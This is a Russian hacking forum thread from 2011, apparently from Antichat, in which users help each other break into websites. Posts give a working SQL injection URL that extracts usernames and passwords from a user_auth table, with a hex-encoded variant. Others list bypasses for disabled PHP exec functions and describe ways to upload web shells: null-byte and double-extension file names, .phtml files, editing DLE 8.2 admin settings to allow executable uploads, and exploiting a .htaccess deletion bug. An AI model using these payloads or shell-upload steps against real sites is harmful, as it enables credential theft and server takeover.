HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #18501  
Старый 05.11.2011, 22:08
Expl0ited
Guest
Сообщений: n/a
Провел на форуме:
262707

Репутация: 935
По умолчанию

Цитата:
Сообщение от SergioBlog  
SergioBlog said:
Если отрублены функции exec,passthru,popen,proc_open,shell_exec,system,pc ntl_exec есть другие варианты?)))
perl, python, ssi, disable_functions bypass
 
Ответить с цитированием

  #18502  
Старый 05.11.2011, 23:38
Einstein
Guest
Сообщений: n/a
Провел на форуме:
3346

Репутация: 0
По умолчанию

Цитата:
Сообщение от Expl0ited  
Expl0ited said:
Код:
Code:
www.xxx.xx/text.php?content_id=-4+union+select+UNHEX(HEX(concat_ws(char(58),user_name,user_password)))+from+user_auth+limit+0,1--+
скобку пропустил
вставил не помогает =(
 
Ответить с цитированием

  #18503  
Старый 05.11.2011, 23:54
aydin-ka
Новичок
Регистрация: 03.05.2009
Сообщений: 7
Провел на форуме:
102906

Репутация: -14
По умолчанию

Хочу залить шелл через баннер / картинку...

Побываю так shell.php%00.gif shell.php.gif если просто shell.php то режет...Локального инклуда нет

Есть ещё варианты?
 
Ответить с цитированием

  #18504  
Старый 06.11.2011, 11:36
tabletkO
Guest
Сообщений: n/a
Провел на форуме:
28093

Репутация: 11
По умолчанию

Einstein,

Код HTML:
HTML:
www.xxx.xx/text.php?content_id=-4+union+select+UNHEX(HEX(concat(user_name,char(58),user_password)))+from+0x757365725f61757468+limit+0,1--+[/HTML
[B]aydin-ka[/B],
Название CMS? Попробуй старый добрый *.phtml.
 
Ответить с цитированием

  #18505  
Старый 06.11.2011, 12:32
-=Sinner=-
Новичок
Регистрация: 17.01.2009
Сообщений: 7
Провел на форуме:
441482

Репутация: 9
По умолчанию

иметься доступ в админ ку DLE V8.2 требуется залить шелл через админ ку как это сделать ?
 
Ответить с цитированием

  #18506  
Старый 06.11.2011, 12:37
tabletkO
Guest
Сообщений: n/a
Провел на форуме:
28093

Репутация: 11
По умолчанию

-=Sinner=-,

через "Настройки системы" пиши в config! Сделай разрешенным тип файла *.phtml и залей прямо с http://site/engine/images.php и т.д.
 
Ответить с цитированием

  #18507  
Старый 06.11.2011, 12:46
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

Цитата:
Сообщение от -=Sinner=-  
-=Sinner=- said:
иметься доступ в админ ку DLE V8.2 требуется залить шелл через админ ку как это сделать ?
прийдется помудрить с разрешенными раширениями.сначала залей .htaccess потом удаляй его..из за баги удалится оригинальный файл потом уже файл нужный
 
Ответить с цитированием

  #18508  
Старый 06.11.2011, 12:49
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

Цитата:
Сообщение от tabletkO  
tabletkO said:
-=Sinner=-
,
через "Настройки системы" пиши в config! Сделай разрешенным тип файла *.phtml и залей прямо с http://site/engine/images.php и т.д.
и часто ты так заливал? и у тебя шелл работал?
 
Ответить с цитированием

  #18509  
Старый 06.11.2011, 12:55
-=Sinner=-
Новичок
Регистрация: 17.01.2009
Сообщений: 7
Провел на форуме:
441482

Репутация: 9
По умолчанию

Цитата:
Сообщение от tabletkO  
tabletkO said:
-=Sinner=-
,
через "Настройки системы" пиши в config! Сделай разрешенным тип файла *.phtml и залей прямо с http://site/engine/images.php и т.д.
Разрешения загружаемых файлов dzmvdq,pdf,htaccess,php,zip,rar,phtml,doc,exe

так же доступна загрузка изображений с самой админки может это как то облегчит заливку шелла ?
 
Ответить с цитированием

  #18510  
Старый 06.11.2011, 13:10
tabletkO
Guest
Сообщений: n/a
Провел на форуме:
28093

Репутация: 11
По умолчанию

Gorev,

да работал, но конечно сначала удалил .htaccess...
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ